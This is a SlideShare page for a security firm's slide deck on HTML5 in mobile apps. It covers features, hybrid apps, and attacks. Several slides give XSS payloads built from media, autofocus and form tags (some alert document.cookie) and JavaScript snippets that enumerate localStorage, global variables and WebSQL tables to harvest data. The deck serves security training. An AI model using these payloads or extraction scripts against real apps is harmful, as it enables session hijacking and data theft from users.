Advertisement
Check these out next
Html5 on mobile
Feb. 2, 2016•0 likes•1,017 views
0 likes
Be the first to like this
Show More
views
Total views
0
On Slideshare
0
From embeds
0
Number of embeds
0
Download to read offline
Report
Software
HTML5 related mobile security issues and concerns.
Blueinfy SolutionsFollow
Web Security Products, Consulting & Training CompanyAdvertisement
Advertisement
Advertisement
Recommended
iOS Application Security TestingBlueinfy Solutions
Applciation footprinting, discovery and enumerationBlueinfy Solutions
Mobile Application Scan and TestingBlueinfy Solutions
Android attacksBlueinfy Solutions
Android secure codingBlueinfy Solutions
Mobile code mining for discovery and exploits nullcongoa2013Blueinfy Solutions
Html5 on mobile
- © Blueinfy Solutions HTML5 and Mobile
- © Blueinfy Solutions What is HTML5 • Enhancement to HTML 4.01 – with more tags – API Support – Functionality to support mobile devices – More types for existing tags • Does not mean old tags will not work • Existing application can be converted by changing “<!DOCTYPE html>” in first line
- © Blueinfy Solutions HTML5 in Mobile • It is changing the game • Apps are migrating to HTML5 and no need to use native • Web vs. Mobile – Both can use HTML5 – No need to manage several code base – HTML+CSS+JS only – Server side services
- © Blueinfy Solutions Technology Vectors
- © Blueinfy Solutions What is running - where??? Presentation Layer Business Layer Data Access Layer Authentication Communication etc. Runtime, Platform, Operating System Components Server side Components Client side Components (Browser) • HTML 5 • DOM • XHR • WebSocket • Storage • WebSQL • Flash • Flex • AMF • Silverlight • WCF • XAML • NET • Storage • JS • Android • iPhone/Pad • Other Mobile
- © Blueinfy Solutions HTML5 in nutshell - Specs 6 Source: http://en.wikipedia.org/wiki/File:HTML5-APIs-and-related-technologies-by-Sergey-Mavrody.png Source: http://html5demos.com/ Evolution going on by Web Hypertext Application Technology Working Group (WHATWG)
- © Blueinfy Solutions Key HTML5 features for Mobile • Offline web application support • Web Storage • GeoLocation API • Canvas 2D Drawing • Video and Audio streaming support 7
- © Blueinfy Solutions HTML5 features not supported on Mobile • Microdata • 3D animation • FileReader API • IndexDB • WebWorkers 8
- © Blueinfy Solutions API (Media, Geo etc.) & Messaging Plug-In Modern Browser Model HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS/Content-Sec Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache FileSystem
- © Blueinfy Solutions Abusing HTML 5 Tags • Various new tags and can be abused, may not be filtered or validated • Media tags <video poster=javascript:alert(document.cookie)// <audio><source onerror="javascript:alert(document.cookie)"> • Form tags <form><button formaction="javascript:alert(document.cookie)">foo <body oninput=alert(document.cookie)><input autofocus> 10
- © Blueinfy Solutions Accessing media tags
- © Blueinfy Solutions Moving/Touch
- © Blueinfy Solutions Login cookie
- © Blueinfy Solutions Profile • Fetch through storage – cookie not needed…
- © Blueinfy Solutions WebSQL data • Through JavaScript one can store information on database. • Example 15
- © Blueinfy Solutions One time fetch
- © Blueinfy Solutions Network calls • HTML 5 provides WebSocket and XHR Level 2 calls • It allows to make cross domains call and raw socket capabilities • It can be leveraged by JavaScript payload • Malware or worm can use it to perform several scanning tasks 17
- © Blueinfy Solutions Same Origin Policy (SOP) • Browser’s sandbox – Protocol, Host and Port should match – It is possible to set document.domain to parent domain if current context is child domain – Top level domain (TLD) locking down helps in sandboxing the context 18
- © Blueinfy Solutions Fetching Location
- © Blueinfy Solutions Location calls
- © Blueinfy Solutions Hybrid App • Android
- © Blueinfy Solutions Integrating native to webview • Hook your handlers to make it hybrid • Interact with webview
- © Blueinfy Solutions Set permissions • Manifest file
- © Blueinfy Solutions Loading Hybrid App
- © Blueinfy Solutions Slidebar type touch views
- © Blueinfy Solutions HTML5 Attacks
- © Blueinfy Solutions API (Media, Geo etc.) & Messaging Plug-In XSS with HTML5 (tags, attributes and events) HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
- © Blueinfy Solutions HTML5 – Tags/Attributes/Events • Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys) • Attributes – form, submit, autofocus, sandbox, manifest, rel etc. • Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc. 28
- © Blueinfy Solutions XSS variants • Media tags • Examples – <video><source onerror="javascript:alert(1)“> – <video onerror="javascript:alert(1)"><source> 29
- © Blueinfy Solutions XSS variants • Exploiting autofocus – <input autofocus onfocus=alert(1)> – <select autofocus onfocus=alert(1)> – <textarea autofocus onfocus=alert(1)> – <keygen autofocus onfocus=alert(1)> 30
- © Blueinfy Solutions XSS variants • Form & Button etc. – <form id="test" /><button form="test" formaction="javascript:alert(1)">test – <form><button formaction="javascript:alert(1)">test • Etc … and more … – Nice HTML5 XSS cheat sheet (http://html5sec.org/) 31
- © Blueinfy Solutions • Once have an entry point – game over! Extraction through XSS
- © Blueinfy Solutions API (Media, Geo etc.) & Messaging Plug-In Web Storage and DOM information extraction HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
- © Blueinfy Solutions Web Storage Extraction • Browser has one place to store data – Cookie (limited and replayed) • HTML5 – Storage API provided (Local and Session) • Can hold global scoped variables • http://www.w3.org/TR/webstorage/ 34
- © Blueinfy Solutions Web Storage Extraction • It is possible to steal them through XSS or via JavaScript • Session hijacking – HttpOnly of no use • getItem and setItem calls • XSS the box and scan through storage
- © Blueinfy Solutions Blind storage enumeration if(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ console.log(i) console.log(localStorage.getItem(i)); } } • Above code allows all storage variable extraction 36
- © Blueinfy Solutions • HTML5 provides virtual file system with filesystem APIs – window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem; • It becomes a full blown local system for application in sandbox • It empowers application File System Storage
- © Blueinfy Solutions • It provides temporary or permanent file system function init() { window.requestFileSystem(window.TEMPORARY, 1024*1024, function(filesystem) { filesys = filesystem; }, catcherror); } • App can have full filesystem in place now. File System Storage
- © Blueinfy Solutions • Assuming app is creating profile on local system Sensitive information filesystem
- © Blueinfy Solutions DOM Storage • Applications run with “rich” DOM • JavaScript sets several variables and parameters while loading – GLOBALS • It has sensitive information and what if they are GLOBAL and remains during the life of application • It can be retrieved with XSS • HTTP request and response are going through JavaScripts (XHR) – what about those vars?
- © Blueinfy Solutions Blind Enumeration for(i in window){ obj=window[i]; try{ if(typeof(obj)=="string"){ console.log(i); console.log(obj.toString()); } }catch(ex){} } 41
- © Blueinfy Solutions Global Sensitive Information Extraction from DOM • HTML5 apps running on Single DOM • Having several key global variables, objects and array – var arrayGlobals = ['my@email.com',"12141hewvsdr9321343423mjf dvint","test.com"]; • Post DOM based exploitation possible and harvesting all these values. 42
- © Blueinfy Solutions Global Sensitive Information Extraction from DOM for(i in window){ obj=window[i]; if(obj!=null||obj!=undefined) var type = typeof(obj); if(type=="object"||type=="string") { console.log("Name:"+i) try{ my=JSON.stringify(obj); console.log(my) }catch(ex){} } } 43
- © Blueinfy Solutions SQL Injection • WebSQL is part of HTML 5 specification, it provides SQL database to the browser itself. • Allows one time data loading and offline browsing capabilities. • Causes security concern and potential injection points. • Methods and calls are possible
- © Blueinfy Solutions SQL Injection • Through JavaScript one can harvest entire local database. • Example
- © Blueinfy Solutions Blind WebSQL Enumeration • We need following to exploit – Database object – Table structure created on SQLite – User table on which we need to run select query 46
- © Blueinfy Solutions Blind WebSQL Enumeration var dbo; var table; var usertable; for(i in window){ obj = window[i]; try{ if(obj.constructor.name=="Database"){ dbo = obj; obj.transaction(function(tx){ tx.executeSql('SELECT name FROM sqlite_master WHERE type='table'', [],function(tx,results){ table=results; },null); }); } }catch(ex){} } if(table.rows.length>1) usertable=table.rows.item(1).name; 47
- © Blueinfy Solutions Blind WebSQL Enumeration • We will run through all objects and get object where constructor is “Database” • We will make Select query directly to sqlite_master database • We will grab 1st table leaving webkit table on 0th entry 48
- © Blueinfy Solutions Blind WebSQL Enumeration 49
- © Blueinfy Solutions Conclusion
Advertisement